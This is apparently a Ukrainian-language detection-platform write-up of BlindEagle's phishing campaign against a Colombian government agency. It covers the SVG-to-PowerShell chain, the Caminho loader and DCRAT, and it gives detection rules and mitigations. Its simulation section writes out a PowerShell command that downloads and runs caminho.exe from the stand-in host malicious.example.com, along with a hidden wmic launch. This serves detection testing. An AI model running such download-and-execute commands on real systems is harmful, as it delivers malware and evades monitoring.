BlindEagle націлюється на державну агенцію Колумбії за допомогою Caminho та DCRAT
Detection stack
- AIDR
- Alert
- ETL
- Query
Короткий огляд
BlindEagle провела операцію зі спір-фішингу, спрямовану на державну агенцію Колумбії, поширивши зброєний SVG-вкладення, що ініціювало ланцюг виконання JavaScript до PowerShell. Цей ланцюг завантажив загрузник, названий Caminho, який потім отримав троян віддаленого доступу з відкритим кодом DCRAT, розміщений на Discord. Завершальна стадія використовувала процесинг hollowing у MSBuild.exe і застосовувала кілька методів ухилення для зменшення виявлення.
Розслідування
Zscaler ThreatLabz проаналізувала ланцюг зараження і повідомила про методику сховання SVG, кілька рівнів обфускації JavaScript, команду PowerShell, викликану через WMI, і доставку Caminho через URL, розміщений на Discord. Розслідування також пов’язало підтримуючу інфраструктуру зі шведськими IP-адресами та динамічним DNS-провайдером (ydns.eu).
Узагальнення
Запровадьте суворіші дії для вхідних вкладень електронної пошти — особливо для SVG-вмісту — і забезпечте знешкодження/перевірку вмісту для вбудованих скриптів. Використовуйте політики веб-проксі для обмеження доступу до підозрілих кінцевих точок з розміщення файлів, включаючи URL-адреси Discord, які використовуються для доставки шкідливого програмного забезпечення. Моніторте незвичайні шаблони виконання PowerShell та WMI і впроваджуйте політики списків дозволених додатків, що охоплюють використання MSBuild.exe.
Відповідь
Відповідь
Активуйте сигналізації для шкідливого артефакту SVG, згаданого імені JavaScript-файлу та завантажень, що досягають URL-адреси Discord. Проводьте пошуки залишків Caminho та DCRAT у пам’яті або на диску, свідчень процесингу hollowing MSBuild.exe та стійкості через зміни реєстру або заплановані завдання. Карантинизуйте уражені кінцеві точки та блокуйте визначений домен C2.
Потік атаки
Детекції
Підозрілі рядки PowerShell (через powershell)
Перегляд
LOLBAS WScript / CScript (через процес створення)
Перегляд
Можливо, Інтернет Архіву, вирішено за незвичним процесом (через dns_query)
Перегляд
Виклик підозрілих методів .NET із PowerShell (через powershell)
Перегляд
IOC (HashMd5) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT
Перегляд
IOC (SourceIP) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT
Перегляд
IOC (HashSha1) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT
Перегляд
IOC (HashSha256) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT
Перегляд
IOC (DestinationIP) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT
Перегляд
Детекція команди PowerShell BlindEagle, що використовує WMI [Windows Powershell]
Перегляд
Виконання симуляції
Передумова: Перевірка телеметрії та базового рівня повинна бути успішною.
Пояснення: Цей розділ деталізує точне виконання техніки противника (TTP), спроектованої для активації правила детекції. Команди та наратив повинні прямо відображати заплановані TTP і намагатися генерацію точної телеметрії, яку очікує логіка детекції.
-
Атака Narrative & Команди:
Атакуючий (BlindEagle) використовує WMI для запуску процесу PowerShell, що завантажує навантаження “Caminho” з віддаленого серверу C2 та виконує його в пам’яті. Використовуючиwmic.exeз методомпроцес call create, зловмисник може запустити PowerShell без взаємодії з користувацькою сесією, що робить активність прихованою. У командному рядку міститься дослівне слово “powershell”, яке відповідає умовам правила детекції.-
Етап 1 – Підготувати шкідливий PowerShell one-liner:
$url = "http://malicious.example.com/caminho.exe" $out = "$env:TEMPcaminho.exe" Invoke-WebRequest -Uri $url -OutFile $out; PowerShell -ExecutionPolicy Bypass -File $out -
Етап 2 – Виконати через WMI:
$psCmd = 'powershell -nop -w hidden -enc ' wmic process call create "$psCmd"
Наявність
powershellв поліCommandLineподії Sysmon Event 1, згенерованадочірнім процесом wmic, активує правило. -
-
Скрипт регресійного тесту:
# Симуляція PowerShell через WMI на прикладі BlindEagle # ---------------------------------------------------------------------- # 1. Визначте шкідливе навантаження (для тесту ми використовуємо безпечну echo-команду) $payload = 'Write-Host "Simulated Caminho execution"' $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) # 2. Створіть командний рядок PowerShell, який включає дослівне слово "powershell" $psCommand = "powershell -NoProfile -EncodedCommand $encoded" # 3. Запустіть команду через WMI (wmic) для генерації події Sysmon EventID 1 $wmicCommand = "wmic process call create `"$psCommand`"" Write-Host "Виконання через WMI: $wmicCommand" Invoke-Expression $wmicCommand # 4. Додатково: Запишіть у консоль для підтвердження Write-Host "Симуляція завершена. Перевірте детекцію в SIEM." -
Команди прибирання:
# Видаліть будь-які тимчасові файли (жоден не створено у цій симуляції) # Припиніть будь-які довготривалі процеси wmic або PowerShell, які використовувалися для тесту Get-Process -Name wmic, powershell -ErrorAction SilentlyContinue | Stop-Process -Force Write-Host "Прибирання завершено."